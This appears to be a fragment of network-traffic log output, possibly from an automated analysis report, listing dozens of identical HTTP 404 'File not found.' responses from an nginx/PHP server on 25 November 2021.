        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:49:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
